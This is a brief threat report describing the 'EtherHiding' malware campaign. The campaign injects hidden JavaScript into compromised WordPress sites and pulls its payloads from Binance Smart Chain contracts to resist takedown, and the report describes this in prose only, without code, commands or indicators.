“EtherHiding” introduces a new method of distributing malicious code by utilizing Binance’s Smart Chain contracts to host parts of the code chain, taking advantage of the decentralized nature of blockchain technology. The attacker initially used hijacked WordPress sites to deceive users into downloading fake browser updates, but shifted to using blockchain after their previous method was taken down. This new campaign is more difficult to detect and take down.
In the attack, a compromised WordPress site is defaced, and a concealed JS code is injected into article pages, which retrieves a second-stage payload from a server controlled by the attackers. The attackers can remotely modify the infection process and display any message they want without accessing the compromised WordPress sites. The new variant of the attack leverages Binance-controlled servers, which are hosted on the Binance Smart Chain (BSC). BSC is a decentralized blockchain owned by Binance and is used to run decentralized apps and smart contracts. By hosting the malicious code on the blockchain, the attackers make it difficult to block or take down.
The malicious code interacts with the blockchain by querying a contract to retrieve a payload that is then evaluated and executed on the user’s browser. The payload includes the second-stage domain address, which is used to obtain another payload for execution. The attack flow involves multiple domains and IP addresses, and the attackers frequently update the chain to swap out the malicious code and affiliated domains. The ultimate goal of the attack is to deface the compromised site with a deceptive overlay page.